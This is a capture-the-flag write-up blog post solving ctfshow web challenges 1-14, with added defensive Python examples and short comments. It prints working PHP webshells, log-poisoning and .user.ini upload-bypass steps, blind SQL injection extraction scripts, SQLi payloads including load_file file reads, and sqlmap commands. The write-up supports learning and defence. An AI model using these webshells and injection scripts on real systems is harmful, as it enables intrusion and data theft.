[Original] ctfshow web (1-14)

web1

web2

Manual injection

sqlmap

web3

web4

payload
?url=/var/log/nginx/access.log

Read the log

Write a one-line webshell into it

<?php @eval($_POST[b]);?>

web5

MD5 collision: v1 may contain only letters, v2 only digits

ctype_alpha: checks that every character is a letter

is_numeric(): checks whether a variable is a number or a numeric string.
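The web5 check compares two MD5 hex strings with PHP's loose ==, so two digests of the form 0e<digits> compare as 0 == 0. This added example (my own code, not from the page) emulates that comparison in Python, shows a letters-only/digits-only pair passing it, and the strict constant-time compare (PHP === / hash_equals) that closes the hole.

```python
import hashlib
import hmac
import re

# PHP's numeric-string grammar: optional sign, decimal digits, optional exponent,
# surrounding whitespace allowed. "0e123" is numeric and evaluates to 0.0.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's `$a == $b` for two strings: if both look numeric, PHP compares
    them as numbers (so "0e123" == "0e456" is true); otherwise bytewise."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def _policy_ok(v1: str, v2: str) -> bool:
    # ctype_alpha / is_numeric style gate from the challenge, ASCII only.
    return v1.isascii() and v1.isalpha() and v2.isdigit() and v1 != v2


def vulnerable_check(v1: str, v2: str) -> bool:
    """web5-style: letters-only v1, digits-only v2, hashes compared with ==."""
    return _policy_ok(v1, v2) and php_loose_eq(md5_hex(v1), md5_hex(v2))


def hardened_check(v1: str, v2: str) -> bool:
    """Same policy, but a constant-time byte comparison (PHP hash_equals / ===)."""
    return _policy_ok(v1, v2) and hmac.compare_digest(md5_hex(v1), md5_hex(v2))


# Two well-known inputs whose MD5 hex digests both have the form "0e<digits>".
V1, V2 = "QNKCDZO", "240610708"

if __name__ == "__main__":
    print(md5_hex(V1), md5_hex(V2))
    print("loose ==:", vulnerable_check(V1, V2), " hash_equals:", hardened_check(V1, V2))
```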

web6

Blind guess: the space is filtered

Just use a comment in place of the space and it works

sqlmap

web7

Essentially boolean-based blind injection

import requests

urls = 'http://478951db-f91e-4a82-9941-c35a7c3ee800.chall.ctf.show/index.php?id=-1/**/or/**/'
true_marker = ' turning'  # text that only appears in the response when the condition is true
name = ''
for number1 in range(1, 50):  # position in the flag (MySQL substr positions start at 1)
    for number2 in range(44, 126):  # ASCII ',' (44) through '}' (125)
        # # database name
        # url = urls + 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d' % (number1, number2)
        # # table names
        # url = urls + 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' % (number1,number2)
        # # column names
        # url = urls + 'ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),%d,1))=%d' % (number1,number2)
        # column data
        url = urls + 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' % (number1,number2)
        response = requests.get(url)
        if true_marker in response.text:
            name += chr(number2)  # chr() converts the code back to its ASCII character
            print(name, '...')
            break
print('\n>>>flag=', name, '<<<\n')

sqlmap

Same as above

web8

Now the comma is filtered as well

import requests

urls = 'http://fdff3c6b-2123-42d2-9830-96145951c2ad.chall.ctf.show/index.php?id=-1/**/or/**/'
true_marker = ' turning'  # text that only appears in the response when the condition is true
name = ''
for number1 in range(1, 50):  # position in the flag (MySQL substr positions start at 1)
    for number2 in range(44, 126):  # ASCII ',' (44) through '}' (125)
        # # database name
        # url = urls + 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d' % (number1, number2)
        # # table names
        # url = urls + 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d' % (number1,number2)
        # column names (limit/offset instead of the comma form)
        url = urls + 'ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/1/**/offset/**/0)from/**/%d/**/for/**/1))=%d' % (number1,number2)
        # # column data
        # url = urls + 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d' % (number1,number2)
        response = requests.get(url)
        if true_marker in response.text:
            name += chr(number2)  # chr() converts the code back to its ASCII character
            print(name, '...')
            break
print('\n>>>flag=', name, '<<<\n')
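A defender-side counterpart to the web4 log poisoning and the web7/web8 blind-injection scripts above. This added example (my own code, not from the page) parses constructed nginx combined-format lines and flags the /**/ comment-as-whitespace injections, schema enumeration, and PHP tags planted in the User-Agent; the log lines are made up for the demo.

```python
import re
from urllib.parse import unquote

# Constructed nginx "combined" access-log lines for the demo (not real traffic).
SAMPLE_LOG = r'''
10.0.0.5 - - [16/Dec/2020:02:20:48 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Dec/2020:02:21:01 +0000] "GET /index.php?id=-1/**/or/**/ascii(substr((select/**/flag/**/from/**/flag)from/**/1/**/for/**/1))=99 HTTP/1.1" 200 612 "-" "python-requests/2.25"
10.0.0.9 - - [16/Dec/2020:02:21:30 +0000] "GET /index.php?id=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1,2 HTTP/1.1" 200 612 "-" "python-requests/2.25"
10.0.0.7 - - [16/Dec/2020:02:22:10 +0000] "GET /?url=/var/log/nginx/access.log HTTP/1.1" 200 9001 "-" "<?php @eval($_POST[b]);?>"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d+) \d+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is applied to the decoded request line, the referer and the user agent.
RULES = {
    "sqli-comment-whitespace": re.compile(r"/\*\*/(or|and|union|select|from|where)\b", re.I),
    "sqli-schema-enum": re.compile(r"information_schema|group_concat\(|load_file\(", re.I),
    "log-poisoning-php-tag": re.compile(r"<\?php|<\?=", re.I),
    "lfi-log-path": re.compile(r"/var/log/", re.I),
}


def scan(log_text: str):
    """Return (ip, rule, field) hits. The request is URL-decoded first so that
    %2F%2A%2A%2F is seen as /**/; the User-Agent is checked as-is for PHP tags."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        fields = {"req": unquote(m["req"]), "ref": m["ref"], "ua": m["ua"]}
        for rule, rx in RULES.items():
            for field, value in fields.items():
                if rx.search(value):
                    hits.append((m["ip"], rule, field))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```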

web9

<?php
    $flag="";
    $password=$_POST['password'];
    if(strlen($password)>10){
        die("password error");
    }
    $sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
    $result=mysqli_query($con,$sql);
    if(mysqli_num_rows($result)>0){
        while($row=mysqli_fetch_assoc($result)){
            echo "登陆成功<br>";
            echo $flag;
        }
    }
?>

This one is hard.

payload:
ffifdyop
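Why ffifdyop works against md5($password, true): the raw digest bytes start with 'or' and are concatenated straight into the query. This added example (my own code, not the challenge's) rebuilds that query in Python over an in-memory SQLite table and contrasts it with a hex digest bound as a parameter; the stored row is constructed for the demo.

```python
import hashlib
import sqlite3


def raw_md5_latin1(password: str) -> str:
    """PHP's md5($p, true): the 16 raw digest bytes, interpolated into SQL as-is."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")


def vulnerable_sql(password: str) -> str:
    """The web9 query built by string concatenation, exactly as in the PHP above."""
    return ("select * from user where username ='admin' and password ='"
            + raw_md5_latin1(password) + "'")


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table user(username text, password text)")
    # Constructed row: the stored password is the hex digest of a secret we never learn.
    con.execute("insert into user values('admin', ?)",
                (hashlib.md5(b"unknown-secret").hexdigest(),))
    return con


def login_vulnerable(password: str) -> bool:
    """Raw bytes 27 6f 72 27 36 ... become ''or'6...', so the OR branch is always true."""
    try:
        return _db().execute(vulnerable_sql(password)).fetchone() is not None
    except sqlite3.Error:
        return False  # a stray quote byte just breaks the query (no login either way)


def login_hardened(password: str) -> bool:
    """Hex digest (only [0-9a-f]) plus a bound parameter: bytes can never become SQL."""
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = "select * from user where username = ? and password = ?"
    return _db().execute(sql, ("admin", digest)).fetchone() is not None


if __name__ == "__main__":
    print(repr(vulnerable_sql("ffifdyop")))
    print("vulnerable:", login_vulnerable("ffifdyop"), " hardened:", login_hardened("ffifdyop"))
```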

web10

Click Cancel


<?php
    $flag="";
    function replaceSpecialChar($strParam){
        $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
        return preg_replace($regex,"",$strParam);
    }
    if (!$con)
    {
        die('Could not connect: ' . mysqli_error());
    }
    if(strlen($username)!=strlen(replaceSpecialChar($username))){
        die("sql inject error");
    }
    if(strlen($password)!=strlen(replaceSpecialChar($password))){
        die("sql inject error");
    }
    $sql="select * from user where username = '$username'";
    $result=mysqli_query($con,$sql);
    if(mysqli_num_rows($result)>0){
        while($row=mysqli_fetch_assoc($result)){
            if($password==$row['password']){
                echo "登陆成功<br>";
                echo $flag;
            }
        }
    }
?>

payload
'or/**/1=1/**/GROUP/**/BY/**/password/**/WITH/**/ROLLUP/**/LIMIT/**/1/**/OFFSET/**/1#

web11

Leave the password empty and log in

Delete this, then refresh

web12

?cmd=highlight_file('index.php');
?cmd=print_r(glob('*'));
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

web13

The scanner didn't find it

e24395a1-1b54-4b11-892e-cdd1b8fd55a0.chall.ctf.show/upload.php.bak

<?php
    header("content-type:text/html;charset=utf-8");
    $filename = $_FILES['file']['name'];
    $temp_name = $_FILES['file']['tmp_name'];
    $size = $_FILES['file']['size'];
    $error = $_FILES['file']['error'];
    $arr = pathinfo($filename);
    $ext_suffix = $arr['extension'];
    if ($size > 24){
        die("error file zise");
    }
    if (strlen($filename)>9){
        die("error file name");
    }
    if(strlen($ext_suffix)>3){
        die("error suffix");
    }
    if(preg_match("/php/i",$ext_suffix)){
        die("error suffix");
    }
    if(preg_match("/php/i",$filename)){
        die("error file name");
    }
    if (move_uploaded_file($temp_name, './'.$filename)){
        echo "文件上传成功!";
    }else{
        echo "文件上传失败!";
    }
?>

Write a one-liner

Since AntSword can't connect, write it in GET form

<?php eval($_GET['a']);

Save it as a.txt and upload it

Then write a .user.ini that includes a.txt and upload that too

auto_prepend_file=a.txt

Once that succeeds

?a=print_r(glob('*'));
?a=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
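The upload.php.bak filter only looks for "php" in the name, so a.txt and a .user.ini that prepends it both pass. This added example (my own code, not the challenge's) re-implements those checks in Python beside a hardened validator that allowlists extensions, rejects dotfiles and PHP-honoured config names, and inspects the body; the limits come from the PHP above, the allowlist is an assumption.

```python
import os
import re

MAX_SIZE, MAX_NAME, MAX_EXT = 24, 9, 3  # limits from upload.php.bak


def original_filter(filename: str, size: int) -> bool:
    """The challenge's checks: size, name length, extension length, and 'php' anywhere."""
    ext = os.path.splitext(filename)[1].lstrip(".")  # pathinfo()['extension']
    if size > MAX_SIZE or len(filename) > MAX_NAME or len(ext) > MAX_EXT:
        return False
    return not re.search(r"php", filename, re.I)


ALLOWED = {"jpg", "png", "gif", "txt"}  # assumed allowlist for this demo
# Files PHP or the web server honours if they land in the docroot.
CONFIG_NAMES = {".user.ini", ".htaccess", "php.ini"}


def hardened_filter(filename: str, size: int, content: bytes) -> bool:
    """Allowlist the extension, reject dotfiles and config names, and refuse
    bodies carrying PHP tags or auto_prepend/append directives, whatever the name."""
    base = os.path.basename(filename)
    if base != filename or base.startswith(".") or base.lower() in CONFIG_NAMES:
        return False
    ext = os.path.splitext(base)[1].lstrip(".").lower()
    if size > MAX_SIZE or len(base) > MAX_NAME or ext not in ALLOWED:
        return False
    if re.search(rb"<\?(php|=)|auto_(prepend|append)_file", content, re.I):
        return False
    return True


if __name__ == "__main__":
    for name, body in [("a.txt", b"<?php eval($_GET['a']);"),
                       (".user.ini", b"auto_prepend_file=a.txt"),
                       ("pic.png", b"\x89PNG\r\n\x1a\n")]:
        print(name, original_filter(name, len(body)), hardened_filter(name, len(body), body))
```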

web14

Can't make sense of it?

Me neither, so try the values one by one

When c=3 the following page appears

Go in and take a look

Blind guess: injection

Looking at the source reveals a filter

Add a tamper script and let it rip

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py --dbs

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web --tables

Column names

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web -T content --columns

Looking at these columns, it's clear the flag we want isn't here

But dump it anyway, just in case

Column data

py sqlmap.py -u http://217d37f2-fe0a-4aef-b39f-3380e4ff74d2.chall.ctf.show/here_1s_your_f1ag.php?query=1 --tamper=space2hash.py -D web -T content -C password --dump

As expected.

Next, let's look at Master Yu's writeup

At this point we find that the database doesn't contain the flag we want, but there is a hint: tell you a secret, secert has a secret… so the flag is very likely in secret.php. Now the question is how to read a file's contents through the database: MySQL provides the load_file() function for reading local files.
So we construct the statement:

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

which returns the following

<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}

That is, if /tmp/gtf1y contains ctf.show, it prints the contents of /real_flag_is_here, so we can simply read /real_flag_is_here directly to get the flag.

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')


==> Please credit the source when reposting <==

Comments

  1. 华扬 (blog owner)
    9 months ago
    2021-3-19 16:44:01

    Let me take a look

  2. 宋清
    12 months ago
    2020-12-16 2:21:54

    Ah, so flowery

  3. 宋清
    12 months ago
    2020-12-16 2:20:48

    Hello
